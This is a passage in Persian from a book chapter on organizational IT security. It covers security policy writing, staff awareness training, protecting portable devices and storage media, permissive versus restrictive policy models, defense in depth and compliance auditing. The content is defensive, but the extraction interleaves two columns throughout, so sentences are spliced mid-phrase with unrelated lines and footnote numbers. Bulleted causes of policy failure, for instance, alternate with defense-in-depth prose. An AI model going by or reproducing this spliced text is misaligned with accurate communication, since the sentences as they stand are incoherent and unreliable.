ﺧﺼﻮﺻﻲ ﻣﺎﻧﺪﻥ ﺁﻧﻬﺎ ﺭﺍ ﺗﻀﻤﻴﻦ ﻛﻨﻴﺪ .ﺧﻼﺻﺔ ﻣﻄﻠﺐ ﺍﻳﻨﻜـﻪ ﺍﺯ
ﻛﻪ ﻣﺴﺌﻮﻟﻴﺖ ﺍﻣﻨﻴﺖ ﺑﺎ ﺁﻧﻬﺎ ﺍﺳﺖ .ﺩﺭ ﺍﻳﻦ ﺑﺨﺶ ﺑﻪ ﻋﻮﺍﻣﻞ ﻣﻬﻢ
ﻧﻴﺎﺯﻫﺎ ﻭ ﺍﺣﺴﺎﺳﺎﺕ ﻛﺎﺭﺑﺮﺍﻥ ﻏﺎﻓﻞ ﻧﺸﻮﻳﺪ.
ﻃﺮﺡ ﺍﻣﻨﻴﺖ ﻫﺮ ﺳﺎﺯﻣﺎﻥ ﺷﺎﻣﻞ ﺍﺭﺗﺒﺎﻃـﺎﺕ ،ﺁﮔـﺎﻫﻲ ،ﺁﻣـﻮﺯﺵ ﻭ
ﺳﺮﻣﺎﻳﻪﮔﺬﺍﺭﻱ ﻣﻨﺎﺳﺐ ﺑﺮﺍﻱ ﺣﻤﺎﻳﺖ ﺍﺯ ﻃﺮﺡ ﻣﻲﭘﺮﺩﺍﺯﻳﻢ.
ﺑﺮ ﺁﻣﻮﺯﺵ ﻭ ﺁﮔﺎﻫﻲ ﺗﻤﺮﻛﺰ ﻛﻨﻴﺪ
ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ ﻛﻪ ﻣﺤﻴﻂ ﺍﻣﻨﻴﺘﻲ ﺧﻮﺩ ﺭﺍ ﻣﻲﺷﻨﺎﺳﻴﺪ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎ ﺭﺍ ﺩﺭ ﺑﺮﻧﺎﻣﺔ ﺁﻣـﻮﺯﺵ ﻭ ﺑـﺎﺯﺁﻣﻮﺯﻱ ﻛﻠﻴـﺔ
ﻛﺎﺭﺑﺮﺍﻥ ﻗﺮﺍﺭ ﺩﻫﻴﺪ .ﻫﺮ ﻛـﺎﺭﺑﺮ ﺑﺎﻳـﺪ ﺁﮔـﺎﻫﻲ ﺍﻭﻟﻴـﻪﺍﻱ ﺩﺭ ﻣـﻮﺭﺩ
ﻫﻨﮕﺎﻣﻴﻜﻪ ﺳﻴﺎﺳﺖ ﺧﻮﺩ ﺭﺍ ﺗﺪﻭﻳﻦ ﻣـﻲﻧﻤﺎﻳﻴـﺪ ،ﺑﺎﻳـﺪ ﺍﻃﻤﻴﻨـﺎﻥ
ﺍﻣﻨﻴﺖ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ،ﻭ ﺳﭙﺲ ﺁﻥ ﻣﻄﺎﻟﺐ ﺑﺎﻳﺪ ﺩﺭ ﻳـﻚ ﺑﺮﻧﺎﻣـﻪ ﻭ
ﺣﺎﺻﻞ ﻛﻨﻴﺪ ﻛﻪ ﺍﻧﻮﺍﻉ ﻣﺨﺘﻠﻒ ﺳﻴﺴﺘﻤﻬﺎ ،ﺷﺒﻜﻪ ﻫﺎ ،ﻛﺎﺭﻛﻨـﺎﻥ ﻭ
ﻗﺎﻟﺐ ﻣﺸﺨﺺ ﺑﺮﺍﻱ ﻭﻱ ﻳﺎﺩﺁﻭﺭﻱ ﺷﻮﻧﺪ )ﺣﺘﻲ ﺍﮔﺮ ﺑﺮﻧﺎﻣﺔ ﻳـﺎﺩﺁﻭﺭﻱ
ﺭﺳﺎﻧﻪﻫﺎﻱ ﺫﺧﻴـﺮﻩﺳـﺎﺯﻱ ﻣﻮﺟـﻮﺩ ﺩﺭ ﻣﺤـﻴﻂ ﺍﻣﻨﻴﺘـﻲ ﺧـﻮﺩ ﺭﺍ
ﺗﻨﻬﺎ ﺷﺎﻣﻞ ﺍﺭﺍﺋﻪ ﻧﺴﺨﻪﺍﻱ ﺍﺯ ﺍﻳـﻦ ﻛﺘـﺎﺏ ﺑـﻪ ﻛﺎﺭﻛﻨـﺎﻥ ﺑﺎﺷـﺪ!( .ﺍﺣﺘﻤـﺎﻝ
ﻣﻲﺷﻨﺎﺳﻴﺪ ﻭ ﻫﻤﺔ ﺁﻧﻬﺎ ﺭﺍ ﺩﺭﻧﻈﺮ ﮔﺮﻓﺘﻪﺍﻳﺪ .ﺍﻳﻦ ﺷﻨﺎﺧﺖ ،ﺁﻧﭽـﻪ
ﮔﺮﻓﺘﺎﺭﺷــﺪﻥ ﻛــﺎﺭﺑﺮﺍﻥ ﺁﻣــﻮﺯﺵﺩﻳــﺪﻩ ﺩﺭ ﺗﺮﻓﻨــﺪﻫﺎ ﻭ ﺧــﺼﻮﺻﹰﺎ
ﺑﺎﻋﺚ ﻧﮕﺮﺍﻧﻲ ﺷﻤﺎﺳﺖ ﺭﺍ ﺗﻌﺮﻳﻒ ﻣـﻲﻛﻨـﺪ .ﻭﻗﺘـﻲ ﺳﻴﺎﺳـﺘﻬﺎ ﺭﺍ
ﺣﻤﻼﺕ ﻣﻬﻨﺪﺳﻲ ﺍﺟﺘﻤﺎﻋﻲ ﻛﻤﺘﺮ ﺍﺳﺖ .ﻫﻤﭽﻨﻴﻦ ﺍﮔﺮ ﻛـﺎﺭﺑﺮﺍﻥ
ﺗﺪﻭﻳﻦ ﻣﻲﻛﻨﻴﺪ ،ﺑﺎﻳﺪ ﺍﻃﻤﻴﻨﺎﻥ ﺣﺎﺻﻞ ﻛﻨﻴﺪ ﻛﻪ ﺗﻤﺎﻡ ﺁﻧﭽـﻪ ﻛـﻪ
ﺑﺪﺍﻧﻨﺪ ﻛﻪ ﻫﺮﻳﻚ ﺍﺯ ﻣﻌﻴﺎﺭﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﭼﺮﺍ ﻣﻮﺭﺩ ﺍﺳـﺘﻔﺎﺩﻩ ﻗـﺮﺍﺭ
ﺩﺭ ﻣﺤﻴﻂ ﺷﻤﺎﺳﺖ ﻭ ﻳﺎ ﻣﻲﺗﻮﺍﻧﺪ ﺑﻪ ﻣﺤﻴﻂ ﺷﻤﺎ ﻭﺍﺭﺩ ﺷﻮﺩ ﻭ ﺑـﺎ
ﮔﺮﻓﺘﻪﺍﻧﺪ ،ﺩﺭ ﺁﻧﺼﻮﺭﺕ ﺍﺣﺘﻤﺎﻝ ﺑﻴﺸﺘﺮﻱ ﻭﺟﻮﺩ ﺧﻮﺍﻫﺪ ﺩﺍﺷﺖ ﻛﻪ
ﻣﻨﺎﺑﻊ ﺍﻃﻼﻋﺎﺗﻲ ﺷﻤﺎ ﺗﻌﺎﻣﻞ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ﺭﺍ ﺍﺯ ﻗﻠﻢ ﻧﻴﺎﻧﺪﺍﺧﺘﻪﺍﻳـﺪ.
ﺍﺯ ﺁﻧﻬﺎ ﺍﺣﺴﺎﺱ ﺭﺿﺎﻳﺖ ﻛﻨﻨﺪ ﻭ ﻫﺮﻳﻚ ﺭﺍ ﺑﺪﺭﺳﺘﻲ ﺍﺟﺮﺍ ﻧﻤﺎﻳﻨﺪ.
ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺳﺎﺯﻣﺎﻧﻬﺎ ﺩﺭ ﺳﺎﻟﻬﺎﻱ ﮔﺬﺷﺘﻪ ﻣﺤﻴﻂ ﺍﻣﻨﻴﺖ ﻓﻨـﺎﻭﺭﻱ
ﺍﻃﻼﻋﺎﺕ ﺧﻮﺩ ﺭﺍ ﺑﺎ ﻫﻤﺎﻥ ﻣﺮﺯﻫﺎﻱ ﺑﻮﺟﻮﺩﺁﻣﺪﻩ ﺑﻮﺳﻴﻠﺔ ﺩﻳﻮﺍﺭﻫـﺎ ﻳﻚ ﺑﺨﺶ ﺣﻴﺎﺗﻲ ﻫﺮ ﺳﻴﺴﺘ ﹺﻢ ﺍﻣﻨﻴﺖ ،ﺍﻋﻄﺎﻱ ﺯﻣـﺎﻥ ﻭ ﻓـﺮﺍﻫﻢ
ﻭ ﻧﺮﺩﻩﻫﺎ ﺗﻌﺮﻳﻒ ﻣﻲﻛﺮﺩﻧﺪ؛ ﺍﻣـﺎ ﺍﻣـﺮﻭﺯﻩ ﻣﺤﻴﻄﻬـﺎﻱ ﺳـﺎﺯﻣﺎﻧﻲ ﻛﺮﺩﻥ ﭘﺸﺘﻴﺎﻧﻲ ﺑﺮﺍﻱ ﺗﺤﺼﻴﻞ ﻭ ﺁﻣﻮﺯﺵ ﺑﻴﺸﺘﺮ ﻛﺎﺭﻛﻨﺎﻥ ﺍﺳـﺖ.
١٥٣ ﺑﺨﺶ ﺳﻮﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ
ﻣﺤﻮﻃﻪ ﺑﺒﺮﺩ ،ﺑﺎ ﭼﻪ ﺭﻭﺷـﻬﺎﻳﻲ ﺑﺎﻳـﺪ ﺍﺯ ﺍﻳـﻦ ﺍﻃﻼﻋـﺎﺕ ﺑﻨﺪﺭﺕ ﺍﻳﻨﻘﺪﺭ ﺍﻳﺴﺘﺎ ﻫﺴﺘﻨﺪ.
ﻣﺤﺎﻓﻈﺖ ﻛﺮﺩ )ﻛﻪ ﺍﻳﻦ ﺍﻣﺮ ﺷﺎﻣﻞ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻫﻢ ﻣـﻲﺷـﻮﺩ( ﻭ ﻫﻨﮕﺎﻡ ﺗﺪﻭﻳﻦ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺧﻮﺩ ﺑﺎﻳﺪ ﻧﻜﺎﺗﻲ ﻣﺜـﻞ ﻣـﻮﺍﺭﺩ ﺯﻳـﺮ ﺭﺍ
ﺍﮔﺮ ﺁﻥ ﺭﺳﺎﻧﻪ ﺩﺯﺩﻳﺪﻩ ﻳﺎ ﮔـﻢ ﺷـﻮﺩ ﭼـﻪ ﺍﻗـﺪﺍﻣﺎﺗﻲ ﺑﺎﻳـﺪ ﺩﺭﻧﻈﺮ ﺑﮕﻴﺮﻳﺪ:
ﺍﻧﺠﺎﻡ ﺩﺍﺩ .ﻫﻤﭽﻨﻴﻦ ﻻﺯﻡ ﺍﺳﺖ ﺑﻄﻮﺭ ﻣﺸﺮﻭﺡ ﺑﻴﺎﻥ ﺷـﻮﺩ
ﻼ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻪ ﭼﮕﻮﻧﻪ ﺑﺎﻳـﺪﺭﺳﺎﻧﻪﺍﻱ ﻛﻪ ﻗﺒ ﹰ ﻫﻨﮕﺎﻣﻴﻜــﻪ ﺍﺯ ﻣﻮﻗﻌﻴــﺖ ﻓﻴﺰﻳﻜــﻲ ﺧــﻮﺩ ﺩﻭﺭ ﻫــﺴﺘﻴﺪ •
ﺍﺯ ﺑـﻴﻦ ﺑـﺮﻭﺩ ﺗـﺎ ﺍﺣﺘﻤـﺎﻝ ﺧﻄﺮﻫـﺎﻱ ﻧﺎﺷـﻲ ﺍﺯ ﺍﻓــﺸﺎﻱ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺑﺮﺍﻱ ﺩﺳﺘﻴﺎﺑﻲ ﺑﻪ ﺍﻃﻼﻋﺎﺕ ﺍﺯ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﻗﺎﺑﻞ
ﺍﻃﻼﻋﺎﺕ ﺭﻭﻱ ﺁﻥ ﻛﺎﻫﺶ ﻳﺎﺑﺪ. ﺣﻤﻞ ﻭ PDAﻫﺎ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ .ﺍﻳﻦ ﻭﺳﺎﻳﻞ ﻣـﻲﺗﻮﺍﻧﻨـﺪ
ﺍﻃﻼﻋﺎﺕ ﺣﺴﺎﺳﻲ ﻣﺜﻞ ﺁﺩﺭﺳﻬﺎﻱ ،IPﺷﻤﺎﺭﻩﻫﺎﻱ ﺗﻠﻔﻦ
ﻭ ﺳﻌﻲ ﻛﻨﻴﺪ ﺑﺮﺍﻱ ﭘﺮﺳﺸﻬﺎﻱ ﺯﻳﺮ ﭘﺎﺳـﺨﻬﺎﻱ ﻣﻨﺎﺳـﺒﻲ ﺩﺍﺷـﺘﻪ ﻭ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺭﺍ ﺩﺭ ﺧﻮﺩ ﺫﺧﻴﺮﻩ ﻛﻨﻨﺪ .ﺍﻳـﻦ ﺳﻴـﺴﺘﻤﻬﺎ
ﺑﺎﺷﻴﺪ: ﻼ ﺑـﺎ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ
ﺑﺎﻳﺪ ﺩﺍﺭﺍﻱ ﺍﻣﻨﻴﺖ ﺣﺪﺍﻗﻠﻲ ﺑﺎﺷـﻨﺪ؛ ﻣـﺜ ﹰ
ﺭﻣﺰﮔﺬﺍﺭﻱ ﻭ ﻳﺎ ﺣﺪﺍﻗﻞ ﻧﺸﺎﻧﻬﺎﻳﻲ ﺑﺮﺍﻱ ﺑﺮﻗﺮﺍﺭﻱ ﺍﻣﻨﻴـﺖ
ﻛﺪﺍﻡ ﺳﻴﺎﺳﺘﻬﺎ ﺑﻪ ﻛﺴﺎﻧﻲ ﻣـﻲﭘﺮﺩﺍﺯﻧـﺪ ﻛـﻪ PDAﻫـﺎ ﻭ •
ﻓﻴﺰﻳﻜﻲ .ﻛﺎﺭﺑﺮﺍﻥ ﺑﺎﻳـﺪ ﺩﺭ ﺭﺍﺑﻄـﻪ ﺑـﺎ ﺧﻄـﺮﺍﺕ ﺩﺯﺩﻱ ﻭ
ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﻛﻴﻔﻲ ﺧﻮﺩ ﺭﺍ ﺑﺮﺍﻱ ﻣﻼﻗﺎﺗﻬـﺎ ﻭ ﻳـﺎ ﺻـﺮﻓﹰﺎ ﺩﺭ
ﺍﺳﺘﺮﺍﻕﺳﻤﻊ ﺁﮔﺎﻩ ﻭ ﺁﻣﻮﺯﺵﺩﻳﺪﻩ ﺑﺎﺷﻨﺪ.
ﺑﺎﺯﺩﻳﺪﻫﺎ ﺑﻪ ﻣﺤﻞ ﻛﺎﺭ ﻣﻲﺁﻭﺭﻧﺪ؟ ﺿﻮﺍﺑﻂ ﺍﺗﺼﺎﻝ ﺁﻧﻬﺎ ﺑـﻪ
ﺷﺒﻜﻪﻫﺎ ،ﺧﻄﻮﻁ ﺗﻠﻔﻦ ،ﭼﺎﭘﮕﺮﻫﺎ ﻭ ﺳﺎﻳﺮ ﺍﺑﺰﺍﺭﻫﺎﻱ ﻣﺤﻞ •
ﺑﺨﺶ ﺳﻮﻡ
ﺳﻴﺎﺳﺖ ﺑﻜﺎﺭ ﻣﻲﺭﻭﺩ. ﻓﻜﺮ ﻛﺮﺩﻥ ﺑﻪ ﻫﻤﺔ ﺍﻳﻦ ﻣﺴﺎﺋﻞ ﻗﺒﻞ ﺍﺯ ﻭﻗﻮﻉ ﻫﺮ ﻣﺸﻜﻠﻲ ﻛﻤﻚ
ﻣﻲﻛﻨﺪ ﻛﻪ ﺑﺘﻮﺍﻥ ﺍﺯ ﻭﻗﻮﻉ ﺁﻥ ﻣـﺸﻜﻞ ﺟﻠـﻮﮔﻴﺮﻱ ﻛـﺮﺩ .ﺗﻬﻴـﺔ
ﻱ ﺭﻋﺎﻳﺖ ﺳﻴﺎﺳﺖ ٨٤ﻋﺒـﺎﺭﺕ ﺍﺳـﺖ ﺍﺯ ﺍﻗـﺪﺍﻣﺎﺗﻲ ﻛـﻪ ﻳﻚ ﻣﻤﻴﺰ ﹺ
ﻋﺒﺎﺭﺗﻬﺎﻱ ﺑﺎﻣﻌﻨﻲ ﺩﺭ ﺳﻴﺎﺳﺖ ﺍﻣﻨﻴﺘﻲ ﺑﻪ ﻫﻤﻪ ﻛﻤـﻚ ﻣـﻲﻛﻨـﺪ
ﺍﻧﺠﺎﻡ ﻣﻲﺷﻮﺩ ﺗﺎ ﻣﺸﺨﺺ ﮔﺮﺩﺩ ﺁﻳﺎ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﺫﻛﺮﺷـﺪﻩ ﺩﺭ
ﻧﮕﺮﺍﻧﻴﻬﺎ ﺭﺍ ﺑﻔﻬﻤﻨﺪ ﻭ ﻣﻜﺎﻧﻴﺰﻣﻬﺎﻱ ﺻـﺤﻴﺢ ﭘﻴـﺸﮕﻴﺮﻱ ﺭﺍ ﺑﻜـﺎﺭ
ﺳﻴﺎﺳﺖ ﺭﻋﺎﻳﺖ ﻣﻲﺷﻮﻧﺪ ﻳـﺎ ﻧـﻪ ،ﻭ ﺍﮔـﺮ ﻧﻤـﻲﺷـﻮﻧﺪ ﺩﻟﻴـﻞ ﺁﻥ
ﺑﻨﺪﻧﺪ.
ﻻ ﻣﻌﻴﺎﺭﻫــﺎ ﻭ ﺭﻭﺷــﻬﺎﻳﻲ ﺑــﺮﺍﻱﭼﻴــﺴﺖ .ﺍﺳــﺘﺎﻧﺪﺍﺭﺩﻫﺎ ﻣﻌﻤــﻮ ﹰ
ﺳﻨﺠﻴﺪﻩﺷﺪﻥ ﺧﻮﺩ ﻧﻴﺰ ﺑﺪﺳﺖ ﻣﻲﺩﻫﻨﺪ ﻛﻪ ﻣﻲﺗﻮﺍﻧﺪ ﺗﻮﺳﻂ ﻳﻚ
ﺑﺮﺍﻱ ﻣﺴﺎﺋﻞ ﺍﻣﻨﻴﺘﻲ ﻳﻚ ﺭﻭﻳﻜﺮﺩ ﭘﺎﻳﻪ ﺍﺗﺨﺎﺫ ﻛﻨﻴﺪ
ﻣﻤﻴﺰ ﺑﺮﺍﻱ ﺍﻧﺪﺍﺯﻩ ﮔﻴﺮﻱ ﺭﻋﺎﻳﺖﺷـﺪﻥ ﻳـﺎ ﻧـﺸﺪﻥ ﺁﻥ ﺍﺳـﺘﺎﻧﺪﺍﺭﺩ
ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﮔﻴﺮﺩ .ﺍﮔﺮ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎ ﺭﻋﺎﻳﺖ ﻧـﺸﺪﻩ ﺑﺎﺷـﻨﺪ، ﺍﺑﺘﺪﺍ ﺑﺒﻴﻨﻴﺪ ﻛﻪ ﻣﻲﺧﻮﺍﻫﻴﺪ ﻃﺒﻖ ﻛﺪﺍﻡ ﺍﻟﮕﻮﻱ ﺯﻳﺮ ﻋﻤـﻞ ﻛﻨﻴـﺪ:
ﺍﻳﻦ ﺍﻣﺮ ﻣﻲﺗﻮﺍﻧﺪ ﻧﺘﻴﺠﺔ ﻫﺮ ﺗﺮﻛﻴﺒﻲ ﺍﺯ ﻣﻮﺍﺭﺩ ﺯﻳﺮ ﺑﺎﺷﺪ: "ﻫﺮﭼﻪ ﺻﺮﺍﺣﺘﹰﺎ ﻣﻤﻨـﻮﻉ ﺍﻋـﻼﻡ ﻧـﺸﺪﻩ ﺑﺎﺷـﺪ ﻣﺠـﺎﺯ ﺍﺳـﺖ" ﻳـﺎ
"ﻫﺮﭼﻪ ﺻﺮﺍﺣﺘﹰﺎ ﻣﺠﺎﺯ ﺩﺍﻧﺴﺘﻪ ﻧﺸﺪﻩ ﺑﺎﺷﺪ ﻣﻤﻨﻮﻉ ﺍﺳـﺖ" .ﺳـﭙﺲ
ﻛﻮﺗﺎﻫﻲ ﻛﺎﺭﻛﻨﺎﻥ؛ •
ﺑﺒﻴﻨﻴﺪ ﻣﻮﺍﺭﺩ ﺩﻳﮕﺮ ﺭﺍ ﭼﮕﻮﻧﻪ ﻣﻲﺧﻮﺍﻫﻴﺪ ﺗﻌﺮﻳـﻒ ﻛﻨﻴـﺪ .ﻣﻤﻜـﻦ
ﺁﻣﻮﺯﺵ ﻧﺎﻛﺎﻓﻲ ﻭ ﻓﻘﺪﺍﻥ ﻣﻬﺎﺭﺗﻬﺎﻱ ﻻﺯﻡ؛ •
ﺍﺳﺖ ﻣﻮﺭﺩ ﺍﻭﻝ ﺑﺎ ﻳﻚ ﻣﺤﻴﻂ ﺗﻘﺮﻳﺒﹰﺎ ﺑﺎﺯ ﺳﺎﺯﮔﺎﺭ ﺑﺎﺷﺪ ،ﻣﺜﻞ ﻳﻚ
ﻛﺎﺭ ﺯﻳﺎﺩ؛ •
ﺩﺍﻧﺸﮕﺎﻩ؛ ﺩﺭﺣﺎﻟﻴﻜﻪ ﻣﻮﺭﺩ ﺩﻭﻡ ﺑﻴﺸﺘﺮ ﺑﺮﺍﻱ ﻳﻚ ﻣﺆﺳﺴﺔ ﺗﺠﺎﺭﻱ
ﻧﻘﺺ ﺍﻣﻜﺎﻧﺎﺕ؛ •
ﻣﻨﺎﺳﺐ ﺍﺳﺖ ،ﻣﺎﻧﻨﺪ ﻳﻚ ﺑﺎﻧﻚ.
ﻧﺪﺍﺷﺘﻦ ﺍﻧﮕﻴﺰﺓ ﻻﺯﻡ؛ •
ﻛﻤﺒﻮﺩ ﻭﺳﺎﻳﻞ ﻛﺎﻓﻲ؛ • ﺩﻓﺎﻉ ﺩﺭ ﻋﻤﻖ
ﻣﻨﺎﺑﻊ ﻧﺎﻛﺎﻓﻲ ﻳﺎ ﻧﺎﻣﻨﺎﺳﺐ؛ •
ﻭﻗﺘﻲ ﺑـﺮﺍﻱ ﺳﻴﺎﺳـﺖ ﻭ ﺭﻭﺷـﻬﺎﻱ ﻣﻘﺎﺑﻠـﺔ ﺧـﻮﺩ ﺑﺮﻧﺎﻣـﻪﺭﻳـﺰﻱ
ﺗﻌﻤﻴﺮﺍﺕ ﻭ ﭘﺸﺘﻴﺒﺎﻧﻲ ﻧﺎﻛﺎﻓﻲ؛ •
ﻣﻲﻛﻨﻴﺪ ،ﺩﺭ ﻳﻚ ﻻﻳﻪ ﻣﺘﻮﻗﻒ ﻧـﺸﻮﻳﺪ ﻭ ﺑـﺮﺍﻱ ﺩﻓـﺎﻉ ﺩﺭ ﺑﺮﺍﺑـﺮ
ﻛﺎﺭﺑﺮﺩ ﻳﺎ ﺑﺎﺭﮔﺬﺍﺭﻱ ﺑﻴﺶ ﺍﺯ ﺣﺪ؛ •
ﺗﻬﺪﻳﺪﺍﺕ ﻣﺨﺘﻠﻒ ،ﭼﻨﺪ ﺳﻄﺢ ﺣﻔﺎﻇﺘﻲ ﻫﻤﭙﻮﺷﺎﻥ ﻭ ﻣﺴﺘﻘﻞ ﺑﻨـﺎ
ﻧﺎﺭﺳﺎﺋﻴﻬﺎﻱ ﺳﺎﺯﻣﺎﻧﻲ؛ •
ﻧﻤﺎﺋﻴﺪ .ﺳﭙﺲ ﻧﻈﺎﺭﺕ ﻭ ﺑﺎﺯﺑﻴﻨﻲ ﺭﺍ ﻧﻴﺰ ﺑﻪ ﺁﻥ ﻣﺠﻤﻮﻋﻪ ﺑﻴﺎﻓﺰﺍﻳﻴﺪ
ﺑﻲﻣﺴﺌﻮﻟﻴﺘﻲ؛ •
ﺗﺎ ﻣﻄﺌﻤﻦ ﺷﻮﻳﺪ ﻛﻪ ﺍﺟﺮﺍﻱ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺍﺗﺨﺎﺫﺷﺪﻩ ،ﺩﺭ ﻋﻤﻞ ﻧﻴﺰ
ﺗﺪﺍﺧﻞ ﻣﺴﺌﻮﻟﻴﺘﻬﺎ؛ •
ﻭﺍﻗﻌﹰﺎ ﺟﻮﺍﺏ ﻣﻲﺩﻫﺪ .ﺍﺣﺘﻤﺎﻝ ﮔﺮﻳﺰ ﻳـﻚ ﻣﻬـﺎﺟﻢ ﺍﺯ ﺗﻨﻬـﺎ ﻳـﻚ
ﺗﻘﺴﻴﻢ ﻛﺎﺭ ﻧﺎﻣﺸﺨﺺ ،ﻧﺎﻫﻤﺎﻫﻨﮓ ﻭ ﮔﻴﺞﻛﻨﻨﺪﻩ؛ •
ﻼ ﺳـﻪﻣﺠﻤﻮﻋﺔ ﺩﻓﺎﻋﻲ ﺑﺴﻴﺎﺭ ﺑﻴﺸﺘﺮ ﺍﺯ ﺍﺣﺘﻤﺎﻝ ﮔﺮﻳـﺰﺵ ﺍﺯ ﻣـﺜ ﹰ
ﻧﺎﺭﺳﺎﺋﻴﻬﺎﻱ ﺳﻴﺎﺳﺖ؛ • ٨٢
ﻣﺮﺣﻠﺔ ﺩﻓﺎﻋﻲ ﺑﻌﻼﻭﺓ ﻳﻚ ﺳﻴﺴﺘﻢ ﺍﺧﻄﺎﺭ ﻣﻲﺑﺎﺷﺪ.
ﻣﺨﺎﻃﺮﺍﺕ ﭘﻴﺶﺑﻴﻨﻲ ﻧﺸﺪﻩ؛ •
ﺳﻴﺎﺳﺘﻬﺎﻱ ﻧﺎﻗﺺ ﻳﺎ ﺍﺯ ﻗﻠﻢ ﺍﻓﺘﺎﺩﻩ؛ •
ﺿﻤﺎﻧﺖ ﺍﺟﺮﺍﻳﻲ ،ﻭ ﺑﺎﺯﺑﻴﻨﻲﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ
ﺳﻴﺎﺳﺘﻬﺎﻱ ﻣﺘﺪﺍﺧﻞ؛ ﻭ •
ﻧﺎﺳﺎﺯﮔﺎﺭﻱ ﺳﻴﺎﺳﺖ ﻭ ﻣﺤﻴﻂ. • ﺗﺪﻭﻳﻦ ﺳﻴﺎﺳﺖ ﺑﻪ ﺗﻨﻬﺎﻳﻲ ﻛﺎﻓﻲ ﻧﻴﺴﺖ ،ﺑﻠﻜﻪ ﺑﺎﻳﺪ ﻣﺮﺗﺒﹰﺎ ﺑﺮﺭﺳﻲ
ﺷﻮﺩ ﻛﻪ ﺁﻳﺎ ﺳﻴﺎﺳﺖ ﺍﺗﺨﺎﺫ ﺷﺪﻩ ﺑﺼﻮﺭﺕ ﺻﺤﻴﺢ ﺍﻋﻤﺎﻝ ﻣﻲﺷﻮﺩ
ﻧﻜﺘﺔ ﻛﻠﻴﺪﻱ ﺩﺭ ﻓﻬﺮﺳﺖ ﺑﺎﻻ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﻣﺸﻜﻼﺕ ﺳﻴﺎﺳـﺖ
ﻳﺎ ﻧﻪ ،ﻭ ﺍﮔﺮ ﺍﻋﻤﺎﻝ ﻣﻲﺷﻮﺩ ﺁﻳﺎ ﻛﺎﻓﻲ ﻭ ﺻﺤﻴﺢ ﺍﺳـﺖ ﻳـﺎ ﺧﻴـﺮ.
ﺭﺍ ﻧﻤﻲﺗﻮﺍﻥ ﻧﺎﺷﻲ ﺍﺯ ﺧﻄﺎﻱ ﻛﺎﺭﺑﺮﺍﻥ ﻳﺎ ﺭﺍﻫﺒﺮﺍﻥ ﺩﺍﻧﺴﺖ .ﺣﺘـﻲ
ﻭﺍﮊﺓ ﻣﻤﻴﺰﻱ ٨٣ﺑﺎﺭ ﻣﻌﻨﺎﻳﻲ ﺟﺪﻳﺪﻱ ﭘﻴﺪﺍ ﻛﺮﺩﻩ ﻭ ﺩﺭﺣـﺎﻝ ﺣﺎﺿـﺮ
ﺁﻣﻮﺯﺵ ﻧﺎﻛﺎﻓﻲ ﻳﺎ ﺍﺿـﺎﻓﻪﻛـﺎﺭ ﺑـﻴﺶ ﺍﺯ ﺣـﺪ ﻋﻤﻮﻣـﹰﺎ ﺩﺭ ﺍﺧﺘﻴـﺎﺭ
ﺣﺪﺍﻗﻞ ﺩﺭ ﻣﻌﺎﻧﻲ ﻣﻤﻴﺰﻱ ﻣﺎﻟﻲ ،ﺩﻧﺒﺎﻟﻪﻫﺎﻱ ﺭﺩﮔﻴﺮﻱ )ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ
ﻱ ﺭﻋﺎﻳﺖ ﻧﺒﺎﻳﺪ ﺑﻌﻨﻮﺍﻥ ﻳـﻚ ﺭﺍﻫﺒﺮﺍﻥ ﻧﻴﺴﺖ .ﺑﻨﺎﺑﺮﺍﻳﻦ ﻳﻚ ﻣﻤﻴﺰ ﹺ
ﻓﺎﻳﻠﻬﺎﻱ ﺛﺒـﺖ( ،ﺑﺎﺯﺑﻴﻨﻲ ﺍﻣﻨﻴﺘﻲ ﻳﻚ ﺳﻴـﺴﺘﻢ ،ﻭ ﺑـﺎﺯﺑﻴﻨﻲ ﺭﻋﺎﻳـﺖ
ﻓﺮﺁﻳﻨﺪ ﻧﺎﻣﻄﻠﻮﺏ ﺩﻳﺪﻩ ﺷﻮﺩ؛ ﺑﻠﻜـﻪ ﺑﺎﻳـﺪ ﺑـﻪ ﺁﻥ ﺑـﺼﻮﺭﺕ ﻳـﻚ
ﺗﻼﺵ ﻫﻤﮕﺎﻧﻲ ﺑﺮﺍﻱ ﺗﺸﺨﻴﺺ ﻣﺸﻜﻼﺕ ،ﻳﺎﻓﺘﻦ ﻭ ﺗﺨـﺼﻴﺺ
ﻣﺠﺪﺩ ﻣﻨﺎﺑﻊ ،ﭘﺎﻻﻳﺶ ﺳﻴﺎﺳﺘﻬﺎ ﻭ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎ ،ﻭ ﺍﻓﺰﺍﻳﺶ ﺁﮔﺎﻫﻲ ﻣﺮﺍﺟﻌﻪ ﻛﻨﻴﺪ ﺑﻪ ﻣﻨﺒﻊ ﺯﻳﺮ ،ﻧﻮﺷﺘﺔ :Tom Kellermann ۸۲
